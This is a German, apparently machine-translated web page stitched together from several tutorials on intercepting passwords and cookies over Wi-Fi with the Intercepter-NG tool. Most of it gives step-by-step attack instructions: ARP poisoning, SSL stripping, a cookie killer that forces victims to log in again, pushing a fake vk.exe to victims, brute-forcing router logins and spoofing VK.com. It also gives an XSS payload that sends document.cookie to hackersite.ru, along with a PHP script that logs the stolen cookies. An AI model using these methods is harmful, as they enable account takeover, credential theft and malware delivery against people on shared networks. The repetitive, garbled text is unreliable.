So fangen Sie Daten über WLAN auf Android ab. Eine einfache Möglichkeit, Kekse zu stehlen. Passwörter und Nachrichten

Abfangjäger ist ein multifunktionales Netzwerktool, mit dem Sie Daten aus dem Datenverkehr (Passwörter, Instant Messenger-Nachrichten, Korrespondenz usw.) abrufen und verschiedene MiTM-Angriffe durchführen können.

Intercepter-Programmschnittstelle
Hauptfunktionalität

  • Abfangen von Instant-Messenger-Nachrichten.
  • Abfangen von Cookies und Passwörtern.
  • Abfangen von Aktivitäten (Seiten, Dateien, Daten).
  • Möglichkeit, Dateidownloads durch das Hinzufügen schädlicher Dateien zu fälschen. Kann in Verbindung mit anderen Dienstprogrammen verwendet werden.
  • Ersetzen von HTTPS-Zertifikaten durch HTTP.
Betriebsarten
Messenger-Modus– ermöglicht Ihnen die Überprüfung der Korrespondenz, die in unverschlüsselter Form gesendet wurde. Es wurde zum Abfangen von Nachrichten in Instant Messengern wie ICQ-, AIM- und JABBER-Nachrichten verwendet.

Auferstehungsmodus– Wiederherstellung nützlicher Daten aus dem Verkehr, aus Protokollen, die den Verkehr im Klartext übertragen. Wenn das Opfer Dateien, Seiten oder Daten anzeigt, können diese teilweise oder vollständig abgefangen werden. Darüber hinaus können Sie die Größe der Dateien festlegen, um das Programm nicht in kleinen Teilen herunterzuladen. Diese Informationen können zur Analyse genutzt werden.

Passwortmodus– Modus zum Arbeiten mit Cookies. Auf diese Weise ist es möglich, Zugriff auf die besuchten Dateien des Opfers zu erhalten.

Scan-Modus– Hauptmodus zum Testen. Um den Scanvorgang zu starten, müssen Sie mit der rechten Maustaste auf „Smart Scan“ klicken. Nach dem Scannen werden im Fenster alle Netzwerkteilnehmer, deren Betriebssystem und andere Parameter angezeigt.

Darüber hinaus können Sie in diesem Modus Ports scannen. Sie müssen die Funktion „Anschlüsse scannen“ verwenden. Natürlich gibt es dafür noch viel mehr funktionale Dienstprogramme, aber das Vorhandensein dieser Funktion ist ein wichtiger Punkt.

Wenn wir an einem gezielten Angriff auf das Netzwerk interessiert sind, müssen wir nach dem Scannen die Ziel-IP mit dem Befehl (Zu Nat hinzufügen) zu Nat hinzufügen. In einem anderen Fenster können weitere Angriffe ausgeführt werden.

Nat-Modus. Der Hauptmodus, der es Ihnen ermöglicht, eine Reihe von Angriffen über ARP durchzuführen. Dies ist das Hauptfenster, das gezielte Angriffe ermöglicht.

DHCP-Modus. Dies ist ein Modus, der es Ihnen ermöglicht, Ihren DHCP-Server hochzufahren, um in der Mitte DHCP-Angriffe zu implementieren.

Einige Arten von Angriffen, die ausgeführt werden können
Website-Spoofing

Um die Website des Opfers zu fälschen, müssen Sie zu Target gehen und anschließend die Website und deren Ersatz angeben. Auf diese Weise können Sie eine ganze Reihe von Websites ersetzen. Es hängt alles davon ab, wie hochwertig die Fälschung ist.

Website-Spoofing

Beispiel für VK.com

Auswahl des MiTM-Angriffs

Änderung der Injektionsregel
Infolgedessen öffnet das Opfer eine gefälschte Website, wenn es vk.com anfordert. Und im Passwortmodus sollten der Benutzername und das Passwort des Opfers vorhanden sein:

Um einen gezielten Angriff durchzuführen, müssen Sie ein Opfer aus der Liste auswählen und es dem Ziel hinzufügen. Dies kann mit der rechten Maustaste erfolgen.

Hinzufügen von MiTm-Angriffen
Jetzt können Sie den Ressurection-Modus verwenden, um verschiedene Daten aus dem Datenverkehr wiederherzustellen.

Opferdateien und Informationen über MiTm-Angriff
Traffic-Spoofing

Festlegen von Einstellungen
Danach ändert sich die Anfrage des Opfers von „Vertrauen“ zu „Verlierer“.

Darüber hinaus können Sie Cookies löschen, sodass sich das Opfer von allen Konten abmeldet und wieder anmeldet. Dadurch können Sie Logins und Passwörter abfangen.

Cookies zerstören

Wie erkennt man mit Intercepter einen potenziellen Sniffer im Netzwerk?

Mit der Option „Promisc-Erkennung“ können Sie ein Gerät erkennen, das im lokalen Netzwerk scannt. Nach dem Scannen wird in der Statusspalte „Sniffer“ angezeigt. Dies ist die erste Möglichkeit, Scanvorgänge in einem lokalen Netzwerk zu erkennen.

Sniffer-Erkennung
SDR HackRF-Gerät


HackRF
SDR ist eine Art Funkempfänger, mit dem Sie mit verschiedenen Funkfrequenzparametern arbeiten können. Somit ist es möglich, das Signal von WLAN, GSM, LTE usw. abzufangen.

HackRF ist ein vollständiges SDR-Gerät für 300 US-Dollar. Der Autor des Projekts, Michael Ossman, entwickelt erfolgreiche Geräte in diese Richtung. Der Bluetooth-Sniffer Ubertooth wurde zuvor entwickelt und erfolgreich implementiert. HackRF ist ein erfolgreiches Projekt, das auf Kickstarter mehr als 600.000 gesammelt hat. 500 dieser Geräte wurden bereits für den Betatest verkauft.

HackRF arbeitet im Frequenzbereich von 30 MHz bis 6 GHz. Die Abtastfrequenz beträgt 20 MHz, wodurch Sie Signale von Wi-FI- und LTE-Netzwerken abfangen können.

Wie kann man sich auf lokaler Ebene schützen?

Lassen Sie uns zunächst die SoftPerfect WiFi Guard-Software verwenden. Es gibt eine portable Version, die nicht mehr als 4 MB benötigt. Damit können Sie Ihr Netzwerk scannen und anzeigen, welche Geräte darauf angezeigt werden. Es verfügt über Einstellungen, mit denen Sie die Netzwerkkarte und die maximale Anzahl der zu scannenden Geräte auswählen können. Darüber hinaus können Sie das Scanintervall festlegen.


SoftPerfect WiFi Guard-Programmoberfläche
Nach dem Scannen sendet das Programm Benachrichtigungen darüber, wie viele unbekannte Geräte vorhanden sind. Dadurch können wir vertrauenswürdige Benutzer hinzufügen und markieren und feststellen, ob jemand eine Verbindung hergestellt hat und beginnt, den Datenverkehr abzuhören. Nach jedem Scanintervall werden Benachrichtigungen gesendet. Auf diese Weise können Sie einen bestimmten Betrüger auf dem Router deaktivieren, wenn verdächtige Aktivitäten vorliegen.


SoftPerfect WiFi Guard-Programmeinstellungen


Möglichkeit, Kommentare für Benutzer hinzuzufügen


Benachrichtigungsfenster für unbekannte Geräte nach jedem angegebenen Scanintervall

Abschluss
Daher haben wir in der Praxis untersucht, wie man mit Software Daten innerhalb eines Netzwerks abfangen kann. Wir haben uns mehrere spezifische Angriffe angesehen, die es Ihnen ermöglichen, an Anmeldedaten und andere Informationen zu gelangen. Darüber hinaus haben wir uns SoftPerfect WiFi Guard angesehen, mit dem Sie Ihr lokales Netzwerk auf einem einfachen Niveau vor abhörendem Datenverkehr schützen können.

Die Methode ist alt, aber effektiv, wir werden alles damit machen Abfangjäger ng.
1. Laden Sie das Programm sniff.su herunter
2. Starten, Netzwerk auswählen, Typ wechseln Ethernet/WLAN Wenn Sie haben W-lan Dann müssen Sie das Symbol auswählen W-lan(links neben der Netzwerkauswahl)

SpoilerTarget">Spoiler

3. Drücken Sie den Knopf Scan-Modus(Radarsymbol)
Klicken Sie mit der rechten Maustaste in das leere Feld und klicken Sie auf das Kontextmenü Intelligente Suche.
Alle mit dem Netzwerk verbundenen Geräte werden angezeigt. Wählen Sie ein Opfer aus (Sie können jeden auswählen, indem Sie die Taste gedrückt halten). Schicht), markieren Sie einfach nicht den Router selbst, sondern IP gewöhnlich 192.168.1.1
Nachdem Sie es ausgewählt haben, klicken Sie mit der rechten Maustaste und klicken Sie Zu Nat hinzufügen

SpoilerTarget">Spoiler

4. Gehen Sie zur Registerkarte Nat
IN Stealth-IP Es ist ratsam, die letzte Ziffer durch eine beliebige unbesetzte Ziffer zu ersetzen, da dadurch Ihre echte Ziffer ausgeblendet wird IP.
Markiere das Feld SSL-Streifen Und SSL-Mitm.(V 0.9.10 auf das Auge im Hut klicken und dort auswählen)

SpoilerTarget">Spoiler

5. Klicken Einstellungen(Zahnräder rechts).
Setzen Sie ein Häkchen Auferstehung(Dadurch können Sie Passwörter und verschlüsselte Cookies abfangen HTTPS Protokoll) und entfernen IP/Mac fälschen. Sie können das Kontrollkästchen aktivieren Kekskiller Dadurch wird das Opfer von der aktuellen Seite, beispielsweise einem sozialen Netzwerk, ausgeschlossen, und das Opfer muss das Passwort erneut eingeben, und wir werden es abfangen. Vergleichen Sie die Einstellungen mit dem Bild.

SpoilerTarget">Spoiler

6. Klicken Sie oben auf die Schaltfläche Mit dem Schnüffeln beginnen/aufhören(Dreieck), klicken Sie im selben Fenster unten auf das Strahlungssymbol ARP-Gift starten/stoppen. Gehen wir zur Registerkarte Passwortmodus und klicken Sie mit der rechten Maustaste in das Fenster und wählen Sie aus Cookies anzeigen(„Dadurch können von Opfern eingegebene Cookies und Passwörter angezeigt werden“)
Das war's, wir warten darauf, dass jemand das Passwort eingibt. Manchmal kommt es vor, dass das Internet nicht mehr funktioniert. Versuchen Sie, selbst auf das Internet zuzugreifen. Wenn es nicht funktioniert, starten Sie das Programm neu.
Mir ist aufgefallen, dass es nicht immer möglich ist, ein Passwort abzufangen, aber tatsächlich funktioniert es fast fehlerfrei.

Hallo Freunde.

Wie versprochen fahre ich mit dem Intercepter-ng-Programm fort.

Heute gibt es einen Rückblick in die Praxis.

Warnung: Sie sollten keine Einstellungen ändern oder gedankenlos auf Einstellungen drücken. Im besten Fall funktioniert es einfach nicht oder Sie schalten WLAN aus. Ich hatte einen Fall, in dem die Routereinstellungen zurückgesetzt wurden. Denken Sie also nicht, dass alles harmlos ist.

Und selbst mit den gleichen Einstellungen wie bei mir heißt das nicht, dass alles reibungslos funktioniert. In schwerwiegenden Fällen müssen Sie auf jeden Fall die Funktionsweise aller Protokolle und Modi studieren.

Lass uns anfangen?

Abfangen von Cookies und Passwörtern.

Beginnen wir mit dem klassischen Abfangen von Passwörtern und Cookies. Im Prinzip ist der Vorgang derselbe wie im Artikel „Passwörter über WLAN abfangen“ und „Cookies über WLAN abfangen“, aber ich werde ihn mit Klarstellungen noch einmal umschreiben.

Übrigens können Antivirenprogramme oft solche Dinge auslösen und das Abfangen von Daten über WLAN verhindern

Befindet sich das Opfer auf einem Android- oder IOS-Gerät, können Sie sich nur mit dem zufrieden geben, was das Opfer nur im Browser eingibt (Passwörter, Websites, Cookies). Wenn das Opfer einen sozialen Client für VK verwendet, treten einfach Probleme auf aufhören zu arbeiten. In der neuesten Version von Intercepter NG können Sie das Problem lösen, indem Sie das Zertifikat des Opfers ersetzen. Mehr dazu später.

Entscheiden Sie zunächst, was Sie vom Opfer bekommen möchten. Vielleicht benötigen Sie Passwörter für soziale Netzwerke oder einfach nur für Websites. Möglicherweise reichen die Cookies aus, um sich als Opfer anzumelden und sofort etwas zu unternehmen, oder Sie benötigen Passwörter zum späteren Speichern. Müssen Sie die vom Opfer angesehenen Bilder und einige Seiten weiter analysieren, oder brauchen Sie diesen Müll nicht? Wissen Sie, dass das Opfer die Website bereits betreten hat (bei der Übergabe bereits autorisiert) oder wird es einfach nur seine Daten eingeben?

Wenn es nicht erforderlich ist, Bilder von den von Ihnen besuchten Ressourcen oder Teile von Mediendateien zu empfangen und einige in einer HTML-Datei gespeicherte Websites anzuzeigen, deaktivieren Sie dies in den Einstellungen – Ressurection. Dadurch wird die Belastung des Routers etwas reduziert.

Was kann in den Einstellungen aktiviert werden – wenn Sie über ein Ethernet-Kabel verbunden sind, müssen Sie Spoof Ip/mac aktivieren. Aktivieren Sie außerdem den Cookie-Killer (hilft, Cookies zurückzusetzen, damit das Opfer die Website verlassen kann). Cookie-Killer ist ein SSL-Strip-Angriff, vergessen Sie also nicht, ihn zu aktivieren.

Es ist auch besser, wenn der Promiscious-Modus aktiviert ist, der es Ihnen ermöglicht, das Abfangen zu verbessern, aber nicht alle Module unterstützen ihn... Der Extreme-Modus kann auch ohne durchgeführt werden. Damit werden manchmal mehr Ports abgefangen, aber es gibt auch zusätzliche Informationen + Last...

Wählen Sie zunächst oben die Schnittstelle aus, über die Sie mit dem Internet verbunden sind, und den Verbindungstyp: WLAN oder Ethernet, wenn die Verbindung über ein Kabel mit dem Router erfolgt.

Klicken Sie im Scanmodus mit der rechten Maustaste auf ein leeres Feld und klicken Sie auf Smart Scan. Alle Geräte im Netzwerk werden gescannt; es müssen nur noch die gewünschten Opfer unter Add nat hinzugefügt werden.

Oder Sie können eine beliebige IP festlegen, in die Einstellungen gehen – Expertenmodus und das Kontrollkästchen für Auto ARP Poison aktivieren. In diesem Fall fügt das Programm alle verbundenen Personen hinzu und stellt eine Verbindung zum Netzwerk her.

Wir müssen lediglich in den Nat-Modus wechseln.

Klicken Sie auf „Mitms konfigurieren“. Hier benötigen wir SSL-Mitm und SSL-Strip.

SSL mitm ermöglicht das Abfangen von Daten, obwohl viele Browser auch darauf reagieren, indem sie das Opfer warnen.

SSL-Streifen Ermöglicht dem Opfer den Wechsel vom sicheren HTTPS-Protokoll zu HTTP und sorgt dafür, dass der Cookie-Killer funktioniert.

Wir brauchen nichts anderes, klicken Sie auf „Arp-Gift starten“ (Strahlungssymbol) und warten Sie auf die Aktivität des Opfers.

Klicken Sie im Abschnitt „Passwortmodus“ mit der rechten Maustaste und zeigen Sie Coolies an. Dann können Sie mit der rechten Maustaste auf das Cookie klicken und zur vollständigen URL gehen.

Wenn sich das Opfer übrigens in sozialen Netzwerken aufhält, besteht die Möglichkeit, dass seine aktive Korrespondenz im Messenger-Modus angezeigt wird.

Http-Inject (eine Datei an das Opfer weiterleiten).

Mmm, eine ziemlich süße Option.

Sie können es dem Opfer zustecken, damit es die Datei herunterlädt. Wir können nur hoffen, dass das Opfer die Datei startet. Zur Plausibilität können Sie analysieren, welche Seiten das Opfer besucht, und so etwas wie ein Update einschleusen.

Wenn das Opfer beispielsweise VK verwendet, nennen Sie die Datei vk.exe. Vielleicht startet das Opfer es und entscheidet, dass es nützlich ist.

Lass uns anfangen.


Bruteforce-Modus.

Brute-Force- und Passwort-Ratemodus.

Eine Möglichkeit, es zu nutzen, ist der brutale Zugriff auf das Admin-Panel des Routers. Auch einige andere Protokolle.

Für Brutus brauchst du

Geben Sie im Zielserver die IP des Routers, das Telnet-Protokoll und den Benutzernamen ein – Benutzername, in unserem Fall Admin.

Unten befindet sich eine Schaltfläche mit einem darauf gezeichneten Ordner, Sie klicken darauf und öffnen eine Liste mit Passwörtern (im Ordner mit dem Programm, misc/pwlist.txt, befindet sich eine Liste häufig verwendeter Passwörter, oder Sie können verwenden Ihre eigene Liste).

Drücken Sie nach dem Laden Start (Dreieck) und gehen Sie Tee trinken.

Bei Übereinstimmungen (ein Passwort ist ausgewählt) wird das Programm beendet.

Sie müssen den Benutzernamen kennen. Wenn Sie jedoch auf den Router zugreifen möchten, versuchen Sie es mit dem Standard-Administrator.

Wie man Brute produziert.

Verkehrswechsler (Verkehrsersatz).

Die Funktion ist eher ein Witz. Sie können es so ändern, dass das Opfer beim Betreten einer Site zu einer anderen wechselt, die Sie betreten.

Geben Sie im Verkehrsmodus links die Anfrage ein, rechts das Ergebnis, jedoch mit der gleichen Anzahl an Buchstaben und Symbolen, sonst funktioniert es nicht.

Beispiel – links geben wir die zu ändernde Abfrage ein, rechts ändern wir test1 in test2. (aktivieren Sie das Kontrollkästchen für HTTP-gzip deaktivieren).

Drücken Sie nach der Eingabe ADD und dann OK.

Zum Schluss noch ein Video zum Abfangen von Daten von iOS-Clients, denn wie Sie wissen, funktionieren deren Anwendungen bei einem Mitm-Angriff einfach nicht mehr.

Ich werde bald ein Video über den Inhalt des Artikels machen.

Es handelte sich um Datenabfang über WLAN.

Das ist es im Grunde. Wenn Sie etwas hinzufügen möchten, schreiben Sie, wenn Sie etwas korrigieren möchten, schreiben Sie einfach.

Bis zum nächsten Mal.

Was ist ein Cookie?

Es gibt einen Mechanismus, der es dem HTTP-Server ermöglicht, einige Textinformationen auf dem Computer des Benutzers zu speichern und dann darauf zuzugreifen. Diese Informationen werden als Cookie bezeichnet. Im Wesentlichen ist jedes Cookie ein Paar: der Name eines Parameters und sein Wert. Jedem Cookie wird außerdem die Domain zugeordnet, zu der es gehört. Aus Sicherheitsgründen darf der http-Server in allen Browsern nur auf das Cookie seiner Domain zugreifen. Darüber hinaus können Cookies ein Ablaufdatum haben. In diesem Fall bleiben sie bis zu diesem Datum auf dem Computer gespeichert, auch wenn Sie alle Browserfenster schließen.


Warum sind Cookies wichtig?

Alle Mehrbenutzersysteme verwenden Cookies zur Identifizierung des Benutzers. Genauer gesagt, die aktuelle Verbindung des Benutzers zum Dienst, Benutzersitzung. Wenn jemand Ihre Cookies erkennt, kann er sich in Ihrem Namen beim System anmelden. Denn derzeit prüfen nur sehr wenige Internetressourcen während einer Benutzersitzung, ob sich die IP-Adresse ändert.


Wie kann ich Cookies ändern oder ersetzen?

Browserentwickler stellen keine integrierten Tools zum Bearbeiten von Cookies zur Verfügung. Sie können aber auch mit einem normalen Notizblock auskommen.


Schritt 1: Erstellen Sie eine Textdatei mit Text

Windows-Registrierungseditor Version 5.00



@="C:\\IE_ext.htm"

Speichern Sie es unter dem Namen IE_ext.reg

Schritt 2: Fügen Sie mithilfe der erstellten Datei Änderungen zur Windows-Registrierung hinzu.

Schritt 3: Erstellen Sie eine Textdatei mit Text

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= „testname=testvalue; path=/; domain=testdomain.ru“;
Alert(external.menuArguments.document.cookie);


Speichern Sie es unter dem Namen C:\IE_ext.htm

Schritt 4: Wir gehen auf die Website, die uns interessiert.

Schritt 5: Klicken Sie mit der rechten Maustaste auf eine leere Stelle auf der Seite und wählen Sie den Menüpunkt aus „Arbeiten mit Cookies“. Erlauben Sie den Zugriff auf die Zwischenablage. Ihre Cookies von dieser Website werden in die Zwischenablage verschoben. Sie können ihren Notizblock einlegen und einen Blick darauf werfen.


Schritt 6: Um einige Cookies zu ändern, bearbeiten Sie die Datei C:\IE_ext.htm und ersetzen Sie sie Testname im Namen von Cookie, Testwert- über seine Bedeutung, testdomain.ru– zur Site-Domain. Fügen Sie bei Bedarf weitere ähnliche Zeilen hinzu. Zur einfacheren Kontrolle habe ich dem Skript die Ausgabe der aktuellen Cookies vor und nach der Änderung hinzugefügt: Alert(external.menuArguments.document.cookie);

Schritt 7: Führen Sie Schritt 5 erneut aus und aktualisieren Sie dann die Seite.

Fazit: Wir werden mit aktualisierten Cookies auf diese Internetressource zugreifen.

Wie stiehlt man Cookies mit JavaScript?

Gelingt es einem Angreifer, ein beliebiges JavaScript-Skript auf dem Computer des Opfers auszuführen, kann er die aktuellen Cookies sehr einfach auslesen. Beispiel:


var str= document.cookie;

Aber wird er sie auf seine Website übertragen können, da, wie ich bereits erwähnt habe, ein JavaScript-Skript ohne zusätzliche Bestätigung nicht auf eine Website zugreifen kann, die sich auf einer anderen Domain befindet? Es stellt sich heraus, dass ein JavaScript-Skript jedes Bild laden kann, das sich auf einem beliebigen http-Server befindet. Übertragen Sie gleichzeitig eventuelle Textinformationen der Download-Anfrage auf dieses Bild. Beispiel: http://hackersite.ru/xss.jpg?text_info Wenn Sie also diesen Code ausführen:

var img= neues Bild();

img.src= „http://hackersite.ru/xss.jpg?“+ encodeURI(document.cookie);


dann landet das Cookie in der Anfrage zum Herunterladen des „Bildes“ und „geht“ zum Angreifer.

Wie gehe ich mit solchen Anfragen um, ein „Bild“ herunterzuladen?

Ein Angreifer muss lediglich ein Hosting mit PHP-Unterstützung finden und dort Code wie diesen platzieren:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Dann werden alle Anfrageparameter für dieses Skript in der Datei gespeichert log.txt. Es bleibt nur noch das zuvor beschriebene JavaScript-Skript zu ersetzen http://hackersite.ru/xss.jpg zum Pfad zu diesem PHP-Skript.


Endeffekt

Ich habe nur die einfachste Möglichkeit gezeigt, XSS-Schwachstellen auszunutzen. Dies beweist jedoch, dass das Vorhandensein mindestens einer solchen Sicherheitslücke auf einer Mehrbenutzer-Internetseite es einem Angreifer ermöglichen kann, deren Ressourcen in Ihrem Namen zu nutzen.

Über die Gefahren offener WLAN-Zugangspunkte, darüber, wie Passwörter abgefangen werden können.

Heute schauen wir uns das Abfangen von Passwörtern über WLAN und das Abfangen von Cookies über WLAN mit dem Programm an.

Der Angriff wird aufgrund von stattfinden Schnüffeln.

Schnüffeln– Sniff bedeutet übersetzt „Schnüffeln“. Mit Sniffing können Sie die Netzwerkaktivität im Internet analysieren, sehen, welche Seiten der Benutzer besucht, und Passwörter abfangen. Es kann aber auch für nützliche Zwecke verwendet werden, um Viren abzuhören, die beliebige Daten ins Internet senden.


Die Methode, die ich zeigen werde, ist ziemlich primitiv und einfach. Tatsächlich können Sie das Programm stärker nutzen.
Offizielle Website des Programms sniff.su (kopieren Sie den Link und öffnen Sie ihn in einem neuen Tab), Sie können ihn im Abschnitt herunterladen "Herunterladen".
Es gibt eine Version für Windows, Unix-Systeme und für Android.
Wir werden Windows in Betracht ziehen, da dies das beliebteste System ist und das Programm hier am fortschrittlichsten ist.
Ihr Browser oder Ihr Antivirenprogramm beschwert sich möglicherweise darüber, dass das Programm gefährlich ist, aber Sie selbst verstehen, dass es sich um ein Hackprogramm handelt und dass es immer auf solche Hacks reagiert.
Das Programm wird in einem Zip-Archiv heruntergeladen. Sie müssen das Programm nur in einen Ordner entpacken und verwenden, es ist keine Installation erforderlich.
Das Programm ist in der Lage, verschiedene Mitm-Angriffe auf Wi-Fi-Netzwerke zu organisieren.
Der Artikel wurde ausschließlich zu Informationszwecken verfasst, um anhand eines Beispiels die Gefahren offener WLAN-Hotspots aufzuzeigen; alle angegebenen Aktionen erfolgen auf eigene Gefahr und Gefahr. Und ich möchte Sie an die strafrechtliche Verantwortlichkeit für den Schutz der Daten anderer Personen erinnern.

Service avi1 bietet atemberaubend günstige Preise für die Möglichkeit, Abonnenten für Ihr Instagram-Profil zu bestellen. Erzielen Sie sofort und ohne großen Aufwand und Zeitaufwand eine höhere Online-Popularität oder einen höheren Umsatz.

Arbeiten mit dem Intercepter NG-Programm

Das Programm wird also über Intercepter-NG.exe gestartet.
Das Programm hat eine englische Benutzeroberfläche, aber wenn Sie ein sicherer Computerbenutzer sind, werden Sie es meiner Meinung nach verstehen.

Nachfolgend finden Sie ein Video zur Einrichtung (für diejenigen, die lieber zuschauen als lesen).
— Wählen Sie oben das gewünschte Netzwerk aus, wenn Sie mehrere davon haben.
— Wechseln Sie den Typ Ethernet/WLAN Wenn Sie über WLAN verfügen, müssen Sie das WLAN-Symbol (links neben der Netzwerkauswahl) auswählen.

- Drücken Sie den Knopf Scan-Modus(Radarsymbol)
— Klicken Sie mit der rechten Maustaste in ein leeres Feld und klicken Sie auf das Kontextmenü Intelligente Suche
— Alle mit dem Netzwerk verbundenen Geräte werden angezeigt
— Wählen Sie das Opfer aus (Sie können alle auswählen, während Sie die Umschalttaste gedrückt halten), markieren Sie jedoch nicht den Router selbst, seine IP lautet normalerweise 192.168.1.1
- Klicken Sie nach der Auswahl mit der rechten Maustaste und klicken Sie Zu Nat hinzufügen


- Gehen Sie zur Registerkarte Nat
- IN Stealth-IP Es ist ratsam, die letzte Ziffer durch eine freie zu ersetzen, da dadurch Ihre tatsächliche IP-Adresse verborgen bleibt.
- Setzen Sie ein Häkchen SSL-Streifen Und SSL-Mitm.


- Klicken Einstellungen(Zahnräder rechts).
- Setzen Sie ein Häkchen Auferstehung(Dadurch können Sie Passwörter und Cookies des verschlüsselten HTTPS-Protokolls abfangen) und entfernen IP/Mac fälschen. Sie können das Kontrollkästchen aktivieren Kekskiller Dadurch wird das Opfer von der aktuellen Seite, beispielsweise einem sozialen Netzwerk, ausgeschlossen, und das Opfer muss das Passwort erneut eingeben, und wir werden es abfangen. Vergleichen Sie die Einstellungen mit dem Bild.


— Hier ist die Einrichtung abgeschlossen, schließen Sie die Einstellungen mit einem Häkchen.
— Die Einrichtung ist abgeschlossen, Sie können mit dem Angriff beginnen.
— Drücken Sie die Taste oben Mit dem Schnüffeln beginnen/aufhören(Dreieck), klicken Sie im selben Fenster unten auf das Strahlungssymbol ARP-Gift starten/stoppen
— Gehen Sie zur Registerkarte Passwortmodus und klicken Sie mit der rechten Maustaste in das Fenster und wählen Sie aus Cookies anzeigen(„Dadurch können von Opfern eingegebene Cookies und Passwörter angezeigt werden“)
Das war's, wir warten darauf, dass jemand das Passwort eingibt.
Manchmal kommt es vor, dass das Internet nicht mehr funktioniert. Versuchen Sie, selbst auf das Internet zuzugreifen. Wenn es nicht funktioniert, starten Sie das Programm neu.
Mir ist aufgefallen, dass es nicht immer möglich ist, ein Passwort abzufangen, aber tatsächlich funktioniert es fast fehlerfrei.

Das ist alles, wir haben uns das Abfangen von Passwörtern über WLAN und das Abfangen von Cookies über WLAN angesehen.

Passen Sie auf sich auf

gastroguru 2017